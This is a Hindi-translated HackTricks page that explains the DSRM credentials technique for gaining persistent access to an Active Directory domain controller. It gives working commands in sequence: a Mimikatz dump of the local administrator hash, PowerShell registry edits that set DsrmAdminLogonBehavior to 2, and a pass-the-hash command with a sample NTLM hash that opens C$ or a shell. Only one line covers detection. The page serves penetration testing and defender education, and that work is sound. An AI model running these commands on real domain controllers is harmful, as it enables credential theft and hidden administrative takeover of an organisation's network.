hacktricks/windows-hardening/active-directory-methodology/dsrm-credentials.md
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00

7.6 KiB

☁️ HackTricks क्लाउड ☁️ -🐦 ट्विटर 🐦 - 🎙️ ट्विच 🎙️ - 🎥 यूट्यूब 🎥

DSRM क्रेडेंशियल्स

प्रत्येक डीसी में एक स्थानीय प्रशासक खाता होता है। इस मशीन में व्यवस्थापक अधिकार होने के साथ, आप मिमीकेट्स का उपयोग करके स्थानीय प्रशासक हैश डंप कर सकते हैं। फिर, इस पासवर्ड को सक्रिय करने के लिए एक रजिस्ट्री को संशोधित करके आप इस स्थानीय प्रशासक उपयोगकर्ता के लिए दूरस्थ रूप से पहुंच कर सकते हैं।
सबसे पहले हमें डीसी के भीतर स्थानीय प्रशासक उपयोगकर्ता का हैश डंप करना होगा:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

तब हमें यह जांचना होगा कि क्या वह खाता काम करेगा, और यदि रजिस्ट्री की मुख्या कुंजी में मान "0" है या यह मौजूद नहीं है, तो आपको इसे "2" पर सेट करना होगा:

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

तब, एक PTH का उपयोग करके आप C$ की सामग्री की सूची बना सकते हैं या यहां तक कि एक शैल प्राप्त कर सकते हैं। ध्यान दें कि उस हैश के साथ मेमोरी में उस पावरशेल सत्र को बनाने के लिए (PTH के लिए) "डोमेन" का उपयोग किया जाता है, वह सिर्फ DC मशीन का नाम होता है:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

इसके बारे में अधिक जानकारी के लिए यहां देखें: https://adsecurity.org/?p=1714 और https://adsecurity.org/?p=1785

सुरक्षा उपाय

  • ईवेंट आईडी 4657 - HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior के निर्माण/परिवर्तन की निगरानी करें
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥